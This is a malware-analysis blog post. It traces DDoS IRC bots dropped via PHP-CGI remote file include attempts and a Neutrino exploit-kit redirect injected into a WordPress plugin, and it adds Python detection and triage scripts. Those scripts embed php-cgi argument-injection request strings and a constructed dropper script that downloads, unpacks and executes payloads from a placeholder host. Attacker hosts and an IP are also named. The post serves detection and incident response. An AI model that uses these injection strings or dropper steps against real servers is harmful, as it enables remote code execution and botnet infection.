DDOS IRC Bot Analysis


This post was contributed by my good friend and all-around good guy, @hkmalwares.

In the last couple of weeks I saw some interesting PHP-CGI remote file include attempts that contained a few DDoS IRC bots. I know these attempts are quite common in the wild, but this one stood out as it downloaded two different IRC bots. In this post I'm going to share what I found interesting about the encounter and do a basic breakdown.
The IDS rule that brought this to my attention was "SERVER-WEBAPP PHP-CGI Remote file include attempt" (SID 22063).

[image: ddosbot_image1]

What triggered the rule is the auto_prepend_file directive within the (truncated) request.
[image: ddosbot_image2]
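The request pattern behind that alert is a php-cgi argument injection: the query string is parsed as php-cgi's command line, so `-d auto_prepend_file=php://input` makes the interpreter execute whatever is in the POST body. The following is an added example (not code from the post or the IDS rule) that flags such requests in a web server access log. The log lines are constructed, the IPs are documentation addresses, and matching on a decoded `-d <directive>` is an approximation of what a rule like SID 22063 looks for, not its actual content.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not from the original post).
# Line 1 mimics the attack: the query string is really a php-cgi command line
# whose -d directives enable remote includes and prepend the POST body as code.
SAMPLE_LOG = r"""
203.0.113.7 - - [12/Oct/2013:10:01:02 +0000] "POST /cgi-bin/php?%2Dd+allow_url_include%3Don+%2Dd+auto_prepend_file%3Dphp%3A%2F%2Finput HTTP/1.1" 200 412 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Oct/2013:10:02:15 +0000] "GET /index.php?page=about HTTP/1.1" 200 8120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Oct/2013:10:03:44 +0000] "POST /index.php?-d%20disable_functions%3D%20-d%20allow_url_include%3D1 HTTP/1.1" 200 398 "-" "curl/7.30"
"""

# Common log format: client, timestamp, "METHOD target PROTOCOL", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Directives an attacker sets to turn the request body into executed PHP or to
# allow including remote files. Approximation of the IDS rule, not its content.
DANGEROUS_DIRECTIVES = ("auto_prepend_file", "allow_url_include", "disable_functions", "safe_mode")
DIRECTIVE_RE = re.compile(r"-d\s*(" + "|".join(DANGEROUS_DIRECTIVES) + r")\b", re.I)


def decode_query(target):
    """URL-decode the query string twice so double-encoded '-d' still surfaces."""
    query = target.partition("?")[2]
    return unquote_plus(unquote_plus(query))


def is_php_cgi_rfi(target):
    """True if the request target carries php-cgi -d directives that enable code injection."""
    return bool(DIRECTIVE_RE.search(decode_query(target)))


def scan_log(text):
    """Return (client IP, decoded query) for every line that looks like the attack."""
    hits = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if m and is_php_cgi_rfi(m.group("target")):
            hits.append((m.group("ip"), decode_query(m.group("target"))))
    return hits


if __name__ == "__main__":
    for ip, query in scan_log(SAMPLE_LOG):
        print(f"PHP-CGI RFI attempt from {ip}: {query}")
```

Decoding twice matters in practice: the alerting request above is percent-encoded, and a second layer of encoding is a cheap way to slip past a rule that only decodes once.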

In this case, had the exploit succeeded, the injected code would try wget, curl, and fetch in turn to pull down the malicious payload.
[image: ddosbot_image3]

Basically, what it does is change directory to /tmp, wget seed.jpg, untar it, grant execute permission on seed.jpg, run it, and then delete itself.
Let's go ahead and simply cat seed.jpg.
[image: ddosbot_image4]

As expected: garbage. Notice the seed.tar string. Let's go ahead and untar it and cat out the result.
[image: ddosbot_image5]

The tar contains a bash script that pulls down two payloads. First, let's dig into ddosperl.jpg. When untarred, it drops libssl3.so.2 (a filename chosen to look like a system library) into /var/temp. So what is libssl3.so.2? A DDoS Perl IRC bot, v1.0. A quick Google search turned up a [pastebin] containing the Perl script.
[image: ddosbot_image6]

[image: ddosbot_image7]
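Running cat on a ".jpg" that is really an archive is the quick way to spot the disguise, but a small triage script does it without the guesswork and without extracting or executing anything. The block below is an added example, not code from the post: it builds a constructed stand-in for seed.jpg (a gzip-wrapped tar whose header records the original name "seed.tar", which is one plausible reason that string showed up in the cat output, and whose only member is a dropper-style shell script with placeholder download hosts), identifies the blob by magic bytes, unwraps it, and lists the tar members, their modes, and any URLs they contain.

```python
import gzip
import io
import re
import tarfile

URL_RE = re.compile(rb"https?://[^\s'\"<>]+")

# Constructed stand-in for seed.jpg (not the real sample): a gzip-compressed tar
# holding one dropper-style script. example.invalid is a placeholder host.
DROPPER_SH = b"""#!/bin/sh
cd /var/tmp
wget -q http://example.invalid/ddosperl.jpg && tar xf ddosperl.jpg && rm -f ddosperl.jpg
wget -q http://example.invalid/flbotbsd.jpg && tar xf flbotbsd.jpg && rm -f flbotbsd.jpg && ./autorun
"""


def build_sample_seed_jpg():
    """Pack DROPPER_SH into a tar, then gzip it with 'seed.tar' as the recorded name."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        info = tarfile.TarInfo("seed.sh")
        info.size = len(DROPPER_SH)
        info.mode = 0o755
        tf.addfile(info, io.BytesIO(DROPPER_SH))
    gz_buf = io.BytesIO()
    with gzip.GzipFile(fileobj=gz_buf, mode="wb", filename="seed.tar") as gz:
        gz.write(tar_buf.getvalue())
    return gz_buf.getvalue()


# (magic bytes, offset, label): the extension says "jpg", the bytes say otherwise.
MAGICS = [
    (b"\xff\xd8\xff", 0, "jpeg"),
    (b"\x1f\x8b\x08", 0, "gzip"),
    (b"\x7fELF", 0, "elf"),
    (b"PK\x03\x04", 0, "zip/jar"),
    (b"ustar", 257, "tar"),
    (b"#!", 0, "script"),
]


def sniff(data):
    for magic, offset, label in MAGICS:
        if data[offset:offset + len(magic)] == magic:
            return label
    return "unknown"


def gzip_original_name(data):
    """Original filename stored in the gzip header (FNAME flag), or None."""
    if data[:2] != b"\x1f\x8b":
        return None
    flags = data[3]
    pos = 10                      # fixed header: ID1 ID2 CM FLG MTIME(4) XFL OS
    if flags & 0x04:              # FEXTRA: skip the extra field first
        xlen = int.from_bytes(data[pos:pos + 2], "little")
        pos += 2 + xlen
    if not flags & 0x08:          # FNAME absent
        return None
    end = data.index(b"\x00", pos)
    return data[pos:end].decode("latin-1")


def triage(data):
    """Identify the blob, unwrap gzip, and list tar members with any URLs they contain.
    Nothing is written to disk and nothing is executed."""
    report = {"type": sniff(data), "gzip_name": gzip_original_name(data), "members": []}
    if report["type"] == "gzip":
        data = gzip.decompress(data)
        report["inner_type"] = sniff(data)
    if sniff(data) != "tar":
        return report
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        for m in tf:
            content = tf.extractfile(m).read() if m.isfile() else b""
            report["members"].append({
                "name": m.name,
                "mode": oct(m.mode & 0o777),
                "type": sniff(content),
                "urls": [u.decode("latin-1") for u in URL_RE.findall(content)],
            })
    return report


if __name__ == "__main__":
    r = triage(build_sample_seed_jpg())
    print(f"seed.jpg is really {r['type']} (original name {r['gzip_name']}), inner {r.get('inner_type')}")
    for m in r["members"]:
        print(m["name"], m["mode"], m["type"], m["urls"])
```

The URLs pulled out of the member scripts are the next-stage indicators (here ddosperl.jpg and flbotbsd.jpg), which is exactly the pivot the analysis above makes by hand; on a real sample, run this on a copy in an isolated VM and never on the host that was attacked.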

The next payload is a little more interesting. Going back to the second payload defined in seed.jpg, we see another wget, this time for flbotbsd.jpg. Again it's a tar; it extracts a hidden directory ".d", then removes flbotbsd.jpg and executes ./autorun.
[image: ddosbot_image8]

I came across what appears to be another IRC bot config, belonging to the same group, within mech.set.
[image: ddosbot_image9]

After a quick Google search I came across others who had encountered this bot before. Caffsec is calling it FlooderIRCBot.

[image: ddosbot_image11]

A [pastebin] posted back in April describes most of the files seen within ".d". It looks like this bot contains a variety of flooder options.

[image: ddosbot_image12]

However, in my example some of those tools are missing and others have been added, such as ZmEu v0.2, XHide (Process Faker) and ZAP. As for AV detection, a lot of these hack tools have been around for a while, so the detection ratios were quite high.
I think this is a good place to stop, as this post is getting too long and was only meant to be a basic dive.

Neutrino at peopleofwalmart[.]com

(Quick post for awareness.) Visitors to www.peopleofwalmart[.]com may encounter the Neutrino exploit kit after clicking through from web search results.

The initial redirect is hiding in /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js, a legitimate Contact Form 7 plugin file into which the redirect code has been injected.
[image: decode]

The injected code loads JavaScript from cda.8s[.]nl/js/ca.js, which in turn creates an iframe pointing at cms.8s[.]nl/index.php?two; there, a table/frameset pulls the landing page from eipei2i.daremis[.]com:8000/iolfyfsow?brvdgrgc=5534337.
A copy of the landing page for review: [pastebin].
[image: two]

The exploit .jar is served from eipei2i.daremis[.]com:8000/etfujnjzq?yuabqjfc=vmjept with Content-Type: image/jpeg, and the encoded payload from eipei2i.daremis[.]com:8000/noxjwhhojy?yrdpew=vmjept with Content-Type: audio/mpeg. Neither declared type matches what is actually served.

[images: people-of-walmart-jar, people-of-walmart-payload]

At the time of this encounter, both cda.8s[.]nl and eipei2i.daremis[.]com resolved to 37.228.92.196.
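Two things in this chain are worth automating: the Content-Type lies (a Java archive labelled image/jpeg, an encoded binary labelled audio/mpeg) and the Referer trail that leads from the victim's search click to the exploit kit. The block below is an added example, not code from the post, working over constructed capture records whose hosts and paths mirror the chain described above (de-fanged in the text, written plainly here) but whose clients, referers and body bytes are made up. It flags responses whose leading bytes contradict the declared type, walks Referer headers back to reconstruct the path to each, and lists the third-party scripts a page loaded, which is where an injected loader such as ca.js surfaces even though the iframe it created carries the page itself as referer.

```python
from urllib.parse import urlsplit

# Constructed capture records (client, url, declared Content-Type, referer, first body bytes).
# Hosts follow the post's chain; the entries themselves are made up for this example.
CAPTURE = [
    ("10.0.0.5", "http://www.peopleofwalmart.com/", "text/html", "https://www.google.com/", b"<!DOCTYPE html>"),
    ("10.0.0.5", "http://www.peopleofwalmart.com/wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js",
     "application/javascript", "http://www.peopleofwalmart.com/", b"/*! jQuery Form"),
    ("10.0.0.5", "http://cda.8s.nl/js/ca.js", "application/javascript", "http://www.peopleofwalmart.com/", b"var ifr=docu"),
    ("10.0.0.5", "http://cms.8s.nl/index.php?two", "text/html", "http://www.peopleofwalmart.com/", b"<table><tr><td>"),
    ("10.0.0.5", "http://eipei2i.daremis.com:8000/iolfyfsow?brvdgrgc=5534337", "text/html",
     "http://cms.8s.nl/index.php?two", b"<html><applet"),
    ("10.0.0.5", "http://eipei2i.daremis.com:8000/etfujnjzq?yuabqjfc=vmjept", "image/jpeg",
     "http://eipei2i.daremis.com:8000/iolfyfsow?brvdgrgc=5534337", b"PK\x03\x04\x14\x00"),
    ("10.0.0.5", "http://eipei2i.daremis.com:8000/noxjwhhojy?yrdpew=vmjept", "audio/mpeg",
     "http://eipei2i.daremis.com:8000/iolfyfsow?brvdgrgc=5534337", b"\x9a\x41\x0c\x7f\x3e"),
    ("10.0.0.9", "http://www.peopleofwalmart.com/", "text/html", "", b"<!DOCTYPE html>"),
]

# What the first bytes should look like for the media types exploit kits like to claim.
EXPECTED_MAGIC = {
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG",),
    "audio/mpeg": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
}
KNOWN_MAGIC = {b"PK\x03\x04": "zip/jar", b"MZ": "pe", b"\x7fELF": "elf"}


def body_mismatch(content_type, body):
    """Describe the lie if the declared Content-Type does not match the body's leading bytes."""
    expected = EXPECTED_MAGIC.get(content_type.split(";")[0].strip().lower())
    if expected is None or any(body.startswith(m) for m in expected):
        return None
    actual = next((label for magic, label in KNOWN_MAGIC.items() if body.startswith(magic)),
                  "unrecognised/encoded")
    return f"declared {content_type} but body looks like {actual}"


def referer_chain(records, client, url):
    """Walk Referer headers backwards from url to reconstruct how the client got there."""
    by_url = {r_url: ref for c, r_url, _ct, ref, _b in records if c == client}
    chain, seen = [url], {url}
    while True:
        ref = by_url.get(chain[-1], "")
        if not ref or ref in seen:        # reached the entry point, or a referer loop
            break
        chain.append(ref)
        seen.add(ref)
    chain.reverse()
    return chain


def third_party_scripts(records, client, page):
    """Scripts the page pulled from other hosts: where an injected loader shows up."""
    page_host = urlsplit(page).hostname
    return [url for c, url, ct, ref, _b in records
            if c == client and ref == page and ct.startswith("application/javascript")
            and urlsplit(url).hostname != page_host]


def find_suspicious(records):
    """(client, url, reason, chain back to the entry point) for every mislabelled response."""
    hits = []
    for client, url, ct, _ref, body in records:
        why = body_mismatch(ct, body)
        if why:
            hits.append((client, url, why, referer_chain(records, client, url)))
    return hits


if __name__ == "__main__":
    for client, url, why, chain in find_suspicious(CAPTURE):
        print(f"{client} {url}: {why}")
        print("   path: " + " -> ".join(chain))
    print("third-party scripts:", third_party_scripts(CAPTURE, "10.0.0.5", "http://www.peopleofwalmart.com/"))
```

The Referer walk gives the iframe path (search engine, compromised page, cms.8s.nl, landing page, jar), which is the view an incident responder needs to name the patient-zero page; the third-party script check then points at ca.js as the loader to pull and decode.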